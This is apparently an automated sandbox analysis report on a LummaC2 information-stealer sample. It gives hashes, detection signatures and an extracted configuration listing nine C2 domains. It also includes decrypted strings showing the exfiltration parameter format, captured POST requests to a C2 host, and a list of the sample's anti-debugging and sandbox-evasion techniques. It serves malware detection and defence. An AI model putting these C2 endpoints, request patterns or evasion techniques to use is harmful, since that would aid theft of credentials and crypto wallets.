Windows Analysis Report
PH1D3KHmOD.exe

Overview

General Information

Sample name: PH1D3KHmOD.exe (renamed because original name is a hash value)
Original sample name: f1f1fb7ce16d5883ea795e1ebbafcf7a.exe
Analysis ID: 1581225
MD5: f1f1fb7ce16d5883ea795e1ebbafcf7a
SHA1: 76f16e6397a95661beeefa1ad5d033c819bdd884
SHA256: d01629b4c91f9bdffa26efc4e7666093d830ec350d4e7435ad525813645a6af9
Tags: exe, user-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PH1D3KHmOD.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\PH1D3KHmOD.exe" MD5: F1F1FB7CE16D5883EA795E1EBBAFCF7A)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "appliacnesot.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz"], "Build id": "d880--8lY"}
Source: sslproxydump.pcap, Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Author: Joe Security
Source: decrypted.memstr, Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Author: Joe Security
No Sigma rule has matched
Timestamp: 2024-12-27T08:49:33.176795+0100, SID: 2028371, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.4, Source Port: 49730, Destination IP: 172.67.165.185, Destination Port: 443, Protocol: TCP
Timestamp: 2024-12-27T08:49:35.367925+0100, SID: 2028371, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.4, Source Port: 49731, Destination IP: 172.67.165.185, Destination Port: 443, Protocol: TCP
Timestamp: 2024-12-27T08:49:34.173741+0100, SID: 2054653, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 192.168.2.4, Source Port: 49730, Destination IP: 172.67.165.185, Destination Port: 443, Protocol: TCP
Timestamp: 2024-12-27T08:49:34.173741+0100, SID: 2049836, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 192.168.2.4, Source Port: 49730, Destination IP: 172.67.165.185, Destination Port: 443, Protocol: TCP

      AV Detection

      Source: PH1D3KHmOD.exe, Avira: detected
      Source: https://mindhandru.buzz/api07, Avira URL Cloud: Label: malware
      Source: https://mindhandru.buzz/apiY, Avira URL Cloud: Label: malware
      Source: https://mindhandru.buzz/api##3YX, Avira URL Cloud: Label: malware
      Source: https://mindhandru.buzz/e, Avira URL Cloud: Label: malware
      Source: PH1D3KHmOD.exe.6656.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "appliacnesot.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz"], "Build id": "d880--8lY"}
      Source: PH1D3KHmOD.exe, Virustotal: Detection: 56%
      Source: PH1D3KHmOD.exe, ReversingLabs: Detection: 60%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: PH1D3KHmOD.exe, Joe Sandbox ML: detected
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, String decryptor output:
        hummskitnj.buzz
        cashfuzysao.buzz
        appliacnesot.buzz
        screwamusresz.buzz
        inherineau.buzz
        scentniej.buzz
        rebuildeso.buzz
        prisonyfork.buzz
        mindhandru.buzz
        lid=%s&j=%s&ver=4.0
        TeslaBrowser/5.5
        - Screen Resoluton:
        - Physical Installed Memory:
        Workgroup: -
        PsFKDg--pablo
      Source: PH1D3KHmOD.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49730 version: TLS 1.2

      Networking

      Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.165.185:443
      Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.165.185:443
      Source: Joe Sandbox View, IP Address: 172.67.165.185
      Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.165.185:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.165.185:443
      Source: global traffic, HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: mindhandru.buzz
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, DNS traffic detected: DNS query: mindhandru.buzz
      Source: unknown, HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: mindhandru.buzz
      Source: PH1D3KHmOD.exe, 00000000.00000003.1734604183.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microp
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735501001.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://mindhandru.buzz/api
      Source: PH1D3KHmOD.exe, 00000000.00000003.1734709037.000000000155B000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735729903.000000000155C000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001559000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://mindhandru.buzz/api##3YX
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://mindhandru.buzz/api07
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735501001.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://mindhandru.buzz/apiY
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735682639.0000000001542000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001542000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://mindhandru.buzz/e
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://mindhandru.buzz/pi
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknown, HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49730 version: TLS 1.2

      System Summary

      Source: PH1D3KHmOD.exe, Static PE information: section name:
      Source: PH1D3KHmOD.exe, Static PE information: section name: .idata
      Source: PH1D3KHmOD.exe, Static PE information: section name:
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014C49D0_2_0014C49D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0029E4BF0_2_0029E4BF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001574B50_2_001574B5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001474B50_2_001474B5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001854BB0_2_001854BB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001544BC0_2_001544BC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016F4BB0_2_0016F4BB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B14AF0_2_001B14AF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014A4C60_2_0014A4C6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001004C60_2_001004C6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014B4CD0_2_0014B4CD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014E4F40_2_0014E4F4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001824FF0_2_001824FF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001024E00_2_001024E0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B54EA0_2_001B54EA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000ED4F30_2_000ED4F3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010C53C0_2_0010C53C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C55320_2_001C5532
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0029C51B0_2_0029C51B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019152D0_2_0019152D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015F52D0_2_0015F52D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0020651B0_2_0020651B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AD5500_2_001AD550
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C254B0_2_001C254B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017654C0_2_0017654C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C85410_2_001C8541
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001635770_2_00163577
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BA5720_2_001BA572
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001045600_2_00104560
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019A5680_2_0019A568
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001735650_2_00173565
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016B56D0_2_0016B56D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C95900_2_001C9590
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019C5880_2_0019C588
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001655800_2_00165580
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BE5850_2_001BE585
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017C5B40_2_0017C5B4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019E5B00_2_0019E5B0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011C5A00_2_0011C5A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001985D90_2_001985D9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011A5D40_2_0011A5D4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A55D30_2_001A55D3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AC5D30_2_001AC5D3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C45CE0_2_001C45CE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E65F00_2_000E65F0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001905E70_2_001905E7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000EF60D0_2_000EF60D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001926120_2_00192612
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F961B0_2_000F961B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F63C0_2_0018F63C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014F6200_2_0014F620
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001956260_2_00195626
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FE6300_2_000FE630
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001186500_2_00118650
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018C6570_2_0018C657
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001426470_2_00142647
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B46460_2_001B4646
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016E6740_2_0016E674
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BB6600_2_001BB660
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000EE6870_2_000EE687
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002A46BE0_2_002A46BE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B76BB0_2_001B76BB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017B6BF0_2_0017B6BF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001996B60_2_001996B6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001976A10_2_001976A1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001526A90_2_001526A9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001046D00_2_001046D0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A66D90_2_001A66D9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B66D00_2_001B66D0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001206F00_2_001206F0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001966EA0_2_001966EA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018D6E20_2_0018D6E2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018171B0_2_0018171B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019D7390_2_0019D739
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001097390_2_00109739
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015873F0_2_0015873F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001457380_2_00145738
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017175B0_2_0017175B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001077400_2_00107740
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001727470_2_00172747
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0029F7710_2_0029F771
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F27500_2_000F2750
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001487740_2_00148774
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001517740_2_00151774
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001427720_2_00142772
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C37990_2_001C3799
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019279F0_2_0019279F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E97800_2_000E9780
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018A7970_2_0018A797
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019F78B0_2_0019F78B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016978A0_2_0016978A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001687B60_2_001687B6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014C7B30_2_0014C7B3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C77B20_2_001C77B2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A87A20_2_001A87A2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019B7A00_2_0019B7A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001557DF0_2_001557DF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001837D30_2_001837D3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015E7DB0_2_0015E7DB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C67D20_2_001C67D2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F57C00_2_000F57C0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001677F20_2_001677F2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015C7F20_2_0015C7F2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014D8160_2_0014D816
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019481A0_2_0019481A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015A81F0_2_0015A81F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016480E0_2_0016480E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000ED83C0_2_000ED83C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B08260_2_001B0826
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000EC8400_2_000EC840
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AF8420_2_001AF842
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B287D0_2_001B287D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A38730_2_001A3873
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A98700_2_001A9870
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018B86F0_2_0018B86F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0027E85A0_2_0027E85A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001968670_2_00196867
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019C8800_2_0019C880
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F8820_2_0018F882
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001188B00_2_001188B0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019A8B40_2_0019A8B4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001388BD0_2_001388BD
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001768B90_2_001768B9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FC8A00_2_000FC8A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001898AA0_2_001898AA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001408A70_2_001408A7
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001628AB0_2_001628AB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001958A40_2_001958A4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001138D00_2_001138D0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E38C00_2_000E38C0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002848FE0_2_002848FE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AA8C00_2_001AA8C0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017D8CA0_2_0017D8CA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014A8F50_2_0014A8F5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A58F10_2_001A58F1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001568E50_2_001568E5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001658E30_2_001658E3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FB8F60_2_000FB8F6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001948E60_2_001948E6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001069100_2_00106910
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017F9130_2_0017F913
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018091F0_2_0018091F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B39130_2_001B3913
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AB9160_2_001AB916
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E59000_2_000E5900
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BE90B0_2_001BE90B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016D9030_2_0016D903
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002AE9020_2_002AE902
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BA9320_2_001BA932
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016F9280_2_0016F928
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016094C0_2_0016094C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AD9700_2_001AD970
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FE9600_2_000FE960
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AC9910_2_001AC991
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001869890_2_00186989
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019898D0_2_0019898D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001549820_2_00154982
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C49850_2_001C4985
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B79BC0_2_001B79BC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BC9BC0_2_001BC9BC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001039B90_2_001039B9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001999A00_2_001999A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001909A30_2_001909A3
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017C9C40_2_0017C9C4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B49FF0_2_001B49FF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001459E40_2_001459E4
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001209E00_2_001209E0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010C9EB0_2_0010C9EB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C59E20_2_001C59E2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011FA200_2_0011FA20
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C0A280_2_001C0A28
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016EA2E0_2_0016EA2E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00163A280_2_00163A28
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00150A560_2_00150A56
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011CA400_2_0011CA40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00144A400_2_00144A40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011DA4D0_2_0011DA4D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00115A4F0_2_00115A4F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017BA670_2_0017BA67
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014DA9D0_2_0014DA9D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00142A840_2_00142A84
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00119A800_2_00119A80
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BDA830_2_001BDA83
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019DAB90_2_0019DAB9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00184ABA0_2_00184ABA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014BABF0_2_0014BABF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00108ABC0_2_00108ABC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B0AD90_2_001B0AD9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014FAD10_2_0014FAD1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_00191AD20_2_00191AD2
